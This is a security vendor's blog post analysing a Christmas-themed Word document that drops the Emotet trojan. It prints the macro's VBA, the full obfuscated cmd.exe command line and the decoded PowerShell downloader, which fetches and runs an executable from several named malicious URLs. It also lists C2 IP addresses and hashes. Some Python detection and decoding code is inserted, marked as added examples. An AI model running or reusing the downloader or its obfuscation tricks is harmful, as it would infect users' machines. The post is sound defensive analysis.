Submitted URL: https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
Effective URL: https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc
THE CHRISTMAS CARD YOU NEVER WANTED - A NEW WAVE OF EMOTET IS BACK TO WREAK
HAVOC




Suleyman Ozarslan, PhD | December 22, 2018


Cybercriminals take advantage of the holidays to improve their malware
distribution rate. We have spotted samples with Christmas-themed filenames such
as ChristmasCard.doc, Christmas-Greeting-Card.doc, Christmas-wishes.doc and
Christmas-Congratulation.doc. When we analyzed the obtained documents, we found
that they download the infamous Emotet malware, a modular banking Trojan that
today works mainly as a downloader or dropper for other banking Trojans. Emotet
continues to hit governments as well as the private and public sectors.


INITIAL ACCESS

The sample analyzed below is ChristmasCard.doc (SHA256:
1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC).

When the victim opens the document, Microsoft Word shows its macro security
prompt, which already tells us that a macro is embedded in the file.

The document body claims that it was created in an earlier version of Microsoft
Office and asks the victim to click Enable Content; doing so launches the code
hidden in the macro.


EXECUTION

The VBA (Visual Basic for Applications) code of the embedded macro is given below:

                Function EiDJKjLt()
                    On Error Resume Next
                    ' The only live statement: Array() is just a wrapper, Interaction.Shell does the work.
                    ' 15 - 15 evaluates to 0 (vbHide), so the spawned cmd.exe window is never shown.
                    kRZXpYi = Array(TXwzCHKXZ, WiFKpY, NTNqBN, Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15), nAwUAJnM)
                    ' Filler: vhWrwwLHwhINhj is never set in this function, so the Case never matches.
                    Select Case vhWrwwLHwhINhj
                        Case 21458470
                            vtPEXawqKYqTzo = 205771406
                            bJOUowYROCUnaEvkFGjfFijV = Oct(fhaIrJIBLlXViMzUwpUGL + CStr(FcGOrIzszdsmIRwIX + Log(298339837) - lOTYOWtjKGpLOXPb / Hex(328677453)))
                            MsgBox (bJOUowYROCUnaEvkFGjfFijV)
                    End Select
                End Function
            

The macro is padded with obfuscated, do-nothing VBA to evade signature-based
security controls. The only line that matters is:

              Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15)

Interaction.Shell runs whatever command string is stored in TextBox1, a form
control that the victim never sees because it is hidden in the document. The
second argument, 15 - 15, evaluates to 0 (vbHide), so the child process runs
without a visible window. We used Debug.Print to dump the content of TextBox1
and obtained the command line that Interaction.Shell executes:

              c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"
            

The command line is heavily obfuscated to make detection difficult; the only
readable fragment is the path
c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe. Three
random directory names are appended to c:\ and then cancelled out by three \..
segments, so the path still resolves to c:\windows\system32\cmd.exe while a
control that matches on the literal path string does not fire. That first
cmd.exe then runs %ProgramData:~0,1%%ProgramData:~9,2%, which applies the same
idea to an environment variable: with ProgramData set to C:\ProgramData,
character 0 is C and characters 9 and 10 are mD, so the expansion spells CmD
and starts a second cmd.exe, this time with /V (delayed expansion) enabled so
that the !variable! references in the rest of the command work.
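The path traversal, %VAR:~% substring and delayed-expansion tricks above are cheap to spot in process-creation telemetry. The following is an added example and not code from the original post: it runs a handful of indicators over Sysmon-style process-creation events. The events, the parent and child image paths, the Office parent list and the shortened XhOY string are constructed for the example; the first command line is modelled on the one dumped from TextBox1.

```python
"""Flag the cmd.exe obfuscation tricks used by the ChristmasCard.doc dropper.

Added example (not from the original post). Runs over process-creation events
in a Sysmon-like shape; the three events below are constructed, with the first
modelled on the command line dumped from TextBox1 (XhOY shortened).
"""
import re

# (indicator name, regex searched over the full command line)
INDICATORS = [
    # random directories cancelled out by \..\ hops that still resolve to system32
    ("dotdot_to_system32",
     re.compile(r"\\\.\.\\(?:[^\s\\]*\\)*?windows\\system32\\", re.I)),
    # %VAR:~start,len% substring expansion used to spell a command name
    ("env_substring_expansion",
     re.compile(r"%[A-Za-z_][A-Za-z0-9_()]*:~-?\d+(?:,-?\d+)?%")),
    # /V (delayed expansion) switch combined with !var! references
    ("delayed_expansion",
     re.compile(r"/V(?::ON)?\b.*!\w+[!:]", re.I | re.S)),
    # for /L loop rebuilding a string, then call %var...% to force a second expansion pass
    ("for_L_call_reexpansion",
     re.compile(r"for\s+/L\s+%\w+\s+in\s*\([^)]*\).*?\bcall\s+%\w+(?::~|%)", re.I | re.S)),
    # "powershell" written backwards, waiting to be reversed at runtime
    ("reversed_powershell", re.compile(r"llehsrewop", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
SHELLS = ("\\cmd.exe", "\\powershell.exe")


def analyze(event):
    """Return the names of every indicator that fires for one process-creation event."""
    hits = []
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS and event.get("Image", "").lower().endswith(SHELLS):
        hits.append("office_spawns_shell")
    cmdline = event.get("CommandLine", "")
    hits.extend(name for name, rx in INDICATORS if rx.search(cmdline))
    return hits


def should_alert(event):
    """Office spawning a shell is enough on its own; otherwise require two obfuscation tricks."""
    hits = analyze(event)
    return ("office_spawns_shell" in hits or len(hits) >= 2), hits


SAMPLE_EVENTS = [
    {   # constructed, modelled on the ChristmasCard.doc command line (XhOY shortened)
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": (
            r'c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c '
            r'%ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=ih tsoh-etirw llehsrewop'
            r'&&for /L %V in (23,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn%"'
        ),
    },
    {   # constructed: Word launching an encoded PowerShell command, no cmd.exe tricks
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA",
    },
    {   # constructed: benign directory listing started from Explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c dir C:\Users\admin\Documents",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        alert, hits = should_alert(ev)
        print("ALERT" if alert else "ok   ", ev["Image"].rsplit("\\", 1)[-1], hits)
```

The individual regexes are deliberately loose; what makes the rule usable is the combination with the parent process and the requirement that at least two tricks appear together, which keeps an administrator's one-off `for /L` loop from paging anyone.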

The commands passed to that second cmd.exe are also obfuscated:

                "set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"
            

The second and third commands do the decoding:

for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%

The for /L loop counts V down from 497 to 0 and on each pass appends character
V of XhOY to xJWn (!XhOY:~%V,1! is a one-character substring, and the !...!
syntax is why the second cmd.exe was started with /V), so when the loop ends
xJWn holds XhOY in reverse order. The call on the final iteration is the other
half of the trick: cmd expands %...% once when it parses the line, and at that
point xJWn does not exist yet, so %xJWn:~6% is left untouched; call forces a
second expansion pass after the loop has filled the variable, and the rebuilt
command runs.

Let’s look at XhOY variable:

'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop

And XhOY in reverse order, which is what call executes:

powershell $KSv='DfV';$ohl=new-object Net.WebClient;$lIY='http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'.Split('@');$svv='mba';$iro = '150';$FBp='Wjn';$kjh=$env:temp+'\'+$iro+'.exe';foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='ORc';If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;$bLW='iGG';break;}}catch{}}$HTB='tWJ';

Now we can see it is a PowerShell command, obfuscated with throw-away variable
assignments ($KSv, $svv, $FBp, $jVi, $bLW, $HTB) that are never read, with the
values that matter ($lIY, $iro, $kjh) hidden among them. Removing the garbage
assignments and folding the constants in leaves the following:

powershell $ohl=new-object Net.WebClient;$lIY='http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'.Split('@');$kjh=$env:temp+'\150.exe';foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;break;}}catch{}}

Briefly, the command tries each of the following URLs in the given order,
downloading to %TEMP%\150.exe with the Net.WebClient.DownloadFile method. A
download counts as successful when the saved file is at least 80,000 bytes
(-ge: greater than or equal to), which filters out error pages and dead links;
a file that passes the check is run with the Invoke-Item cmdlet and the loop
exits with break. Any exception, including a failed connection, is swallowed by
the empty catch block and the next URL is tried.

                http://www.ideenweberei.com/L9NXvhd
                http://www.capbangkok.com/p1SolwJv
                http://www.trinityriveroutfitters.com/W4CGsWIzI
                http://www.hayashitoysmart.com/add_favorites/XJJSoydNv
                http://cleeft.nl/60ILq1CgH
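The reversal and the IOC extraction above can be reproduced without ever running cmd.exe or PowerShell. The following is an added example, not code from the original post: it emulates cmd.exe's %VAR:~start,len% substring rules and the for /L loop exactly as cmd evaluates them, rebuilds the reversed string from the command line dumped from TextBox1 (PAGE_CMDLINE is copied from the post), and pulls the download URLs, drop path and size threshold out of the result. The default value of ProgramData is assumed.

```python
"""Emulate the cmd.exe tricks in the ChristmasCard.doc dropper and pull IOCs out.

Added example, not code from the original post. It implements the two pieces of
cmd.exe syntax the dropper relies on, without running cmd.exe:

  %VAR:~start%       substring from `start` to the end of the value
  %VAR:~start,len%   `len` chars from `start`; a negative `start` counts from
                     the end, a negative `len` drops that many chars from the end
  for /L %V in (a,s,b) do set X=!X!!VAR:~%V,1!   copies VAR char by char into X

PAGE_CMDLINE is the command line dumped from TextBox1 in the post.
"""
import re

SUBSTRING_RE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")
SET_FOR_RE = re.compile(
    r"\bset\s+(\w+)=(.*?)&&for\s+/L\s+%(\w+)\s+in\s*\((-?\d+),(-?\d+),(-?\d+)\)",
    re.I | re.S)
URL_LIST_RE = re.compile(r"'((?:https?://[^'@]+@?)+)'\.Split\('@'\)")


def cmd_substring(value, start, length=None):
    """%VAR:~start,len% with cmd.exe's rules for negative and out-of-range offsets."""
    n = len(value)
    begin = n + start if start < 0 else start
    begin = max(0, min(begin, n))
    if length is None:
        return value[begin:]
    stop = n + length if length < 0 else begin + length
    return value[begin:max(begin, min(stop, n))]


def expand_substrings(text, env):
    """Resolve every %VAR:~...% in `text` against `env` (names are case-insensitive)."""
    env = {k.lower(): v for k, v in env.items()}

    def repl(m):
        value = env.get(m.group(1).lower())
        if value is None:  # on the command line cmd leaves unknown names as they are
            return m.group(0)
        length = None if m.group(3) is None else int(m.group(3))
        return cmd_substring(value, int(m.group(2)), length)

    return SUBSTRING_RE.sub(repl, text)


def for_L_rebuild(value, start, step, end):
    """What `for /L %V in (start,step,end) do set X=!X!!VAR:~%V,1!` leaves in X."""
    out, v = [], start
    while (step > 0 and v <= end) or (step < 0 and v >= end):
        out.append(cmd_substring(value, v, 1))
        v += step
    return "".join(out)


def decode_dropper(cmdline):
    """Find the `set NAME=...&&for /L` pair in a command line and rebuild the string it assembles."""
    m = SET_FOR_RE.search(cmdline)
    if not m:
        return None
    start, step, end = (int(m.group(i)) for i in (4, 5, 6))
    return for_L_rebuild(m.group(2), start, step, end)


def extract_iocs(ps):
    """Download URLs, drop path and the size check from the reversed PowerShell."""
    m = URL_LIST_RE.search(ps)
    urls = m.group(1).split("@") if m else []
    drop = None
    m = re.search(r"\$env:temp\+'\\'\+\$(\w+)\+'\.exe'", ps)
    if m:  # $kjh=$env:temp+'\'+$iro+'.exe'  -> look up what $iro holds
        v = re.search(r"\$" + re.escape(m.group(1)) + r"\s*=\s*'([^']*)'", ps)
        if v:
            drop = "%TEMP%\\" + v.group(1) + ".exe"
    size = re.search(r"-ge\s+(\d+)", ps)
    return {"urls": urls, "drop_path": drop, "min_size": int(size.group(1)) if size else None}


PAGE_CMDLINE = (
    r'c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c '
    r'%ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY='
    r""";'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop"""
    r'&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"'
)

if __name__ == "__main__":
    # ProgramData's default value is assumed; it is what makes the expansion spell "CmD"
    print(expand_substrings("%ProgramData:~0,1%%ProgramData:~9,2%", {"ProgramData": r"C:\ProgramData"}))
    ps = decode_dropper(PAGE_CMDLINE)
    print(ps)
    print(extract_iocs(ps))
```

The decoder stops at the rebuilt string and does not apply the trailing %xJWn:~6% offset on purpose: on the value as reproduced in this post, dropping six characters would cut into the word powershell, so the listing is evidently not a byte-exact copy of the sample and offsets should be taken from the original document rather than from the text here.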
            

When we started to examine the 150.exe file (SHA256:
5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D), we realized
that it is the infamous Emotet trojan.

As expected from an Emotet sample, it tries to download a file from the
following locations:

                213.120.119.231:8443
                78.189.21.131:80
                187.140.90.91:8080
                81.150.17.158:50000
                1.150.17.158:8443
                201.190.150.60:443
            

After a few failed attempts it downloaded archivesymbol.exe (SHA256:
5DA7A92311FDA255EFAC52C6BFEBCED31BD584453F6BB4F8DE6CDD1B2505B00F) from
201.190.150.60:443 into the C:\Users\admin\AppData\Local\archivesymbol\ folder.
Emotet artifacts usually mimic the names of legitimate executables. To persist
on the victim system, archivesymbol.exe writes its full path as a value under
the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key in the
Registry, so it is started again at every logon of that user.
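A hunting check for the persistence mechanism just described, as an added example rather than code from the original post: it parses the text printed by `reg query` for the HKCU Run key and flags values whose executable sits in a directory any user process could have written to. The sample output is constructed, with the archivesymbol entry modelled on the post and the other two values invented; ENV holds assumed values for expanding REG_EXPAND_SZ data.

```python
"""Audit HKCU Run-key values for executables living in user-writable directories.

Added example, not code from the original post. Parses the text `reg query`
prints for HKCU\Software\Microsoft\Windows\CurrentVersion\Run (the sample
below is constructed) and flags values whose program sits where any user
process could have written it, which is exactly where archivesymbol.exe lands.
"""
import re

# Constructed sample output of:
#   reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive          REG_SZ           "C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    archivesymbol     REG_SZ           C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
    Vendor Updater    REG_EXPAND_SZ    "%ProgramFiles%\Vendor\updater.exe" -silent
"""

# Assumed environment (lower-cased names) used to expand REG_EXPAND_SZ data.
ENV = {"programfiles": r"C:\Program Files", "localappdata": r"C:\Users\admin\AppData\Local"}

VALUE_LINE_RE = re.compile(r"^\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.*)$")
# directory fragments an unprivileged process can write to
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\",
                 "\\programdata\\", "\\temp\\")
# user-writable too, but the usual home of legitimate per-user installs: review rather than alert
KNOWN_PER_USER = ("\\appdata\\local\\microsoft\\",)


def parse_reg_query(text):
    """Yield (value_name, type, data) for each value line of `reg query` output."""
    for line in text.splitlines():
        m = VALUE_LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)


def executable_path(data, env=ENV):
    """Program path from Run-value data: the quoted path, or the leading token ending in .exe."""
    data = re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), data)
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = re.match(r"(.+?\.exe)(?:\s|$)", data, re.I)
    return m.group(1) if m else data.split(" ")[0]


def suspicious_run_entries(text, env=ENV):
    """(name, path, verdict) for every Run value whose executable is in a user-writable directory."""
    findings = []
    for name, _type, data in parse_reg_query(text):
        path = executable_path(data, env)
        low = path.lower()
        if not any(frag in low for frag in USER_WRITABLE):
            continue
        verdict = "review" if any(k in low for k in KNOWN_PER_USER) else "suspicious"
        findings.append((name, path, verdict))
    return findings


if __name__ == "__main__":
    for name, path, verdict in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"{verdict:10} {name:15} {path}")
```

Run it against `reg query` output exported from each user hive, not just the one you are logged in as: the key is per user, and Emotet writes it for whichever account opened the document.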


CONCLUSION

In this wave of attacks, Emotet spreads through emails that lure victims into
opening a Christmas-themed Word document. Its macro launches cmd.exe, which
rebuilds and runs a PowerShell downloader that fetches the Emotet payload; every
stage of the command chain is heavily obfuscated for defense evasion.

With the Email Threat Simulation (ETS) Module, Picus customers can test how well
their network and client security systems block malicious emails such as these,
without waiting to be infected by malware such as Emotet.

In addition, using the Picus Endpoint Simulation Module (ESM), you can challenge
your endpoint security controls against a wide range of threats, from basic
attacks to Advanced Persistent Threats (APTs), with up-to-date attack techniques
mapped to MITRE’s ATT&CK framework.

As a conclusion, you can continuously verify and improve your security measures
by utilizing the most practical, quick-to-apply, and immediate mitigation
actions provided by Picus.

If you want to know how your enterprise security devices are blocking these
attacks, you can contact us at demo@picussecurity.com. Within a few hours, we
can quickly report to you how your network security systems protect against
Emotet and other current cyber attacks!


PROCESS GRAPH


MITRE’S ATT&CK TECHNIQUES OBSERVED

Initial Access
 * T1193 Spearphishing Attachment
 * T1192 Spearphishing Link

Execution
 * T1059 Command-Line Interface
 * T1086 PowerShell
 * T1035 Service Execution
 * T1106 Execution through API
 * T1064 Scripting

Persistence
 * T1060 Registry Run Keys / Startup Folder
 * T1050 New Service
 * T1137 Office Application Startup

Defense Evasion
 * T1140 Deobfuscate/Decode Files or Information
 * T1112 Modify Registry

Discovery
 * T1012 Query Registry
 * T1082 System Information Discovery
 * T1057 Process Discovery
 * T1010 Application Window Discovery

Command and Control
 * T1071 Standard Application Layer Protocol
 * T1065 Uncommonly Used Port

These are technique IDs from the 2018 ATT&CK matrix, before sub-techniques were
introduced. Several have since been renumbered (for example T1086 PowerShell is
now T1059.001, T1193 Spearphishing Attachment is T1566.001, T1060 Registry Run
Keys is T1547.001 and T1065 Uncommonly Used Port is T1571), so map them to the
current matrix before reusing them in detection content.


INDICATORS OF COMPROMISE (IOC)



DELIVERY DOCUMENTS



DROPPED EMOTET TROJANS



URLS



CONNECTED IPS


